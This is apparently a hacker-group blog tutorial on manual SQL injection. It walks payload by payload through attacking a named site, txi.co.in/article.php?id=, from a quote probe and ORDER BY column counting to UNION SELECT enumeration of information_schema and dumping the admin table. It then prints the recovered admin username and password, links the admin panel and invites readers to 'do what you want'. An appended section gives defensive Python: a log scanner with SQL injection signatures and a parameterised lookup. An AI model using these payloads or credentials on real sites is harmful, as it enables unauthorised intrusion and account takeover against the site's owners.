How To Manual Sql Injection - Step by Step
Pak Virus Army, 12:37, SQL Injection

How To Manual Sql Injection - Step By Step

First we need to find a website which is vulnerable to SQL injection attacks. Use Google dorks for finding a web :) OK, so let's start :)

I found a vulnerable site :) Here it is:
txi.co.in/article.php?id=2

By adding ' at the end we check whether the site is vulnerable or not, like this:
txi.co.in/article.php?id=2'
You can see an error in the middle of the page.

OK, so let's find its columns :) For finding the columns we use order by "num"--+, like this: order by 1--+ (increase the number until we get an error).
http://txi.co.in/article.php?id=2' order by 1--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 2--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 3--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 4--+ (NO ERROR)
http://txi.co.in/article.php?id=2' order by 5--+ (ERROR)
We get an error on order by 5--+, which means the site has only 4 columns.

Now let's find the valid string. For finding the valid string we use:
http://txi.co.in/article.php?id=2' and 0 union select 1,2,3,4--+
(We select 4 columns because the website has 4 columns, and we use "and 0" to make the original query false.) After that a number will show on the screen. Here 2 and 3 are showing, which means 2 and 3 are the vulnerable columns.

Now replace 2 with group_concat(table_name), and at the end write from information_Schema.tables where table_schema=database(), like this:
http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(table_name),3,4 from information_Schema.tables where table_schema=database()--+
Here we got all the tables in the current database :) :) We need the admin username and password for login; it should be in the admin table.

Note: admin tables are sometimes named differently, like users, adminlogin, user_login, etc. Here we have the admin table named "admin".

Now, for getting the columns of the table, we use group_concat(column_name) in place of (table_name), and at the end write from information_schema.columns where table_name=(HEX VALUE OF TABLE)--+, like this:
http://txi.co.in/article.php?id=2%27%20and%200%20union%20select%201,group_concat%28column_name%29,3,4%20from%20information_Schema.columns%20where%20table_name=0x61646d696e--+
The hex of admin is 0x61646d696e (you will learn that) :) Now we got the username and password columns.

To dump the data from the columns we use group_concat(login,0x3a,password) in place of (column_name), and at the end write from admin--+, like this:
http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(login,0x3a,password),3,4%20from admin--+
Here we got the username and password ;) ;)
Username : admin
Password : hitesh123

Now login into the admin panel :D :D and do what you want :P :P
Admin Panel : http://www.txi.co.in/admin/login.php

Regards,
-tr0jAn* hAx0R *
-----------------------------END---------------------------------------------------
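The request sequence walked through above (a lone quote probe, ORDER BY column counting, then UNION SELECT against information_schema with a hex-encoded table name) leaves a distinctive trail in the web server's access log, and the whole chain depends on the id parameter being spliced into the SQL string. The following Python is an added example written for this page, not code from the post or its author: it runs simple signatures over constructed Apache-style log lines that mirror the post's requests, groups the hits by client, and then shows a parameterised lookup for article.php?id= that treats the same inputs as plain data. The log lines, the IP addresses, the article table and every function name are made up for the example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (made up for this example) that
# follow the request sequence in the post: quote probe, ORDER BY column
# counting, then UNION SELECT against information_schema.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:37:01 +0000] "GET /article.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:37:04 +0000] "GET /article.php?id=2' HTTP/1.1" 200 480 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:37:09 +0000] "GET /article.php?id=2'%20order%20by%204--+ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:37:11 +0000] "GET /article.php?id=2'%20order%20by%205--+ HTTP/1.1" 200 480 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:37:20 +0000] "GET /article.php?id=2'%20and%200%20union%20select%201,group_concat(table_name),3,4%20from%20information_Schema.tables%20where%20table_schema=database()--+ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:37:31 +0000] "GET /article.php?id=2%27%20and%200%20union%20select%201,group_concat%28column_name%29,3,4%20from%20information_Schema.columns%20where%20table_name=0x61646d696e--+ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:12:38:00 +0000] "GET /article.php?id=3 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

# One signature per step of the walk-through; matched against the URL-decoded,
# whitespace-collapsed query string so %20 / + encoding does not hide anything.
SIGNATURES = {
    "order_by_probe":     re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":       re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "hex_literal":        re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "sql_comment":        re.compile(r"(--|#)\s*$|/\*"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def classify_query(raw_query: str) -> list[str]:
    """Return the names of the signatures that fire on one raw query string."""
    decoded = " ".join(unquote_plus(raw_query).split())
    tags = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # A bare quote with no other SQL token is the first probe in the sequence.
    if not tags and "'" in decoded:
        tags.append("quote_probe")
    return tags


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (ip, path, tags) for every request that trips at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        tags = classify_query(path.partition("?")[2])
        if tags:
            hits.append((m.group("ip"), path, tags))
    return hits


def stages_by_client(hits) -> dict[str, set[str]]:
    """Collapse hits to the set of attack stages seen per client IP."""
    stages: dict[str, set[str]] = {}
    for ip, _path, tags in hits:
        stages.setdefault(ip, set()).update(tags)
    return stages


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the table behind article.php?id= (not the real site)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)", [(1, "First"), (2, "Second")])
    return conn


def lookup_article(conn: sqlite3.Connection, raw_id: str):
    """Hardened lookup: validate the type, then bind the value instead of splicing it."""
    if not raw_id.isdigit():          # "2' order by 5--" never reaches the database
        return None
    row = conn.execute("SELECT title FROM article WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for ip, path, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {path[:60]:<60} {','.join(tags)}")
    print(stages_by_client(scan_log(SAMPLE_LOG)))
    db = build_demo_db()
    print(lookup_article(db, "2"), lookup_article(db, "2' order by 5--"))
```

Run stand-alone, the scanner flags five of the seven constructed requests, all from one client, and the per-client summary shows the full progression from quote probe to schema enumeration. The two lookup calls return "Second" and None: with the value validated and bound, the quote, the ORDER BY and the UNION are just characters in an id that does not exist.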